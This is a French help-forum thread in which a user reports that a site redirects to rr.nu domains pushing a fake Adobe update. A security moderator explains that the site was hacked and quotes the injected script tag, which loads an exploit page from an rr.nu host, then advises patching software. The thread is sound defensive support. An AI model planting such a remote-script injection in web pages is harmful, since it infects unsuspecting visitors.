Sujet Précédent Sujet Suivant

Redirection vers un site en rr.nu

Fermé
Celia16 - 12 janv. 2012 à 16:39
 Celia16 - 12 janv. 2012 à 19:18
Bonjour,



J'ai un souci avec un site dont je me sers régulièrement, donc en plus de m'inquiéter niveau sécurité, ça me handicape un peu.

Quand je me rends sur http://www.subdiff.com/, ça me redirige vers une page en rr.nu, dont le nom semble aléatoire mais toujours sous la forme lettre/chiffres/lettre (là par exemple : 'http://ener36ators.rr.nu/n.php?h=1&s=pmg'). Plusieurs fois ça m'a affiché une adresse du genre adobeplayer2mac.rr.nu en me disant que le plugin adobe avait planté et que je devais télécharger la version 11. Je précisé que quand je tombe sur l'adresse adobeplayer2mac on me propose donc de télécharger la V11 alors qu'avec les autres adresses je finis par être redirigée vers google.

La fenêtre de téléchargement pour adobe 11 est exactement la même que celle d'adobe et bête que je suis et la première à me méfier, j'ai fini par cliquer sur installer... Pour l'instant rien de bizarre, mais quand je vois qu'en tapant rr.nu dans google des mots comme hacking ressortent, heu...!!! Du coup je n'ose plus taper aucun mdp et j'ai peur d'avoir chopé un truc, même sous mac. Je précise d'ailleurs que j'ai Windows installé en parallèle et qu'il était ouvert quand j'ai cliqué sur installer.

Ce que j'ai tenté :
- J'ai installé la dernière version d'adobe pour vérifier que ce soit pas ça le problème, ça change rien.
- J'ai désinstallé 2-3 plugins firefox assez louches (genre anonymoux)
- J'ai lancé un scan avast sous windows (3 trucs détectés mis en quarantaine, mais ça me semble bizarre qu'un truc ouvert sous firefox mac puisse contaminer windows)

Bref voilà, jsuis assez inquiète. C'est déjà arrivé à quelqu'un ou est-ce que vous auriez quelque chose à me conseiller ? Un bon logiciel anti-virus sous mac (je sais qu'il y en a, mais apparemment aucun ne sort du lot...) ?
A voir également:

2 réponses

Réponse 1 / 2
Malekal_morte- Messages postés 180304 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020 24 629
Modifié par Malekal_morte- le 12/01/2012 à 17:20
Salut,

Ca n'a rien à voir avec toi.
Le site a été hacké et une redirection y a été ajouté, visible à la fin du code de la page principale : <script src="hxxp://plode59dopen.rr.nu/pmg.php"></script>
afin d'infecter les visiteurs.

~~

Important - ton infection est venue par un exploit sur site web :

Un exploit sur site WEB permet l'infection de ton ordinateur de manière automatiquement à la visite d'un site WEB qui a été hacké, il tire partie du fait que tu as des logiciels (Java, Adobe Reader etc) qui sont pas à jour et possèdent des vulnérabilités qui permettent l'execution de code (malicieux dans notre cas) à ton insu.
Le fait de ne pas avoir des logiciels à jour et qui ont potentiellement des vulnérabilités permettent donc d'infecter ton système.
Exemple avec : Exploit Java

IMPORTANT : mettre à jour tes programmes notamment Java/Adobe Reader et Flash :
/faq/13362-mettre-a-jour-son-pc-contre-les-failles-de-securite
https://forum.malekal.com/viewtopic.php?t=15960&start=

Passe le mot à tes amis !

Like the angel you are, you laugh creating a lightness in my chest,
Your eyes they penetrate me,
(Your answer's always 'maybe')
That's when I got up and left
1
Réponse 2 / 2
Celia16
12 janv. 2012 à 19:18
Merci pour ta réponse !

Je vais vérifier que tous mes logiciels sont à jour, et puis surtout faire un scan complet windows avec avast qui m'a détecté des virus quand j'ai fait un scan rapide.
0

Discussions similaires

Colis en cours de transport vers votre site de livraison ?
Ninan_5568 -
senda -

8 réponses
il est en cours de transport vers votre site de livraison
3rin -
Afrikarnak -

4 réponses
'Votre colis est dans le site de livraison qui dessert votre adresse' que faire
relakztek82 -
Unemeuf -

25 réponses
Que signifie ''Votre colis est arrivé sur son site de distribution'' ?
jouhry113 -
Chanchan -

25 réponses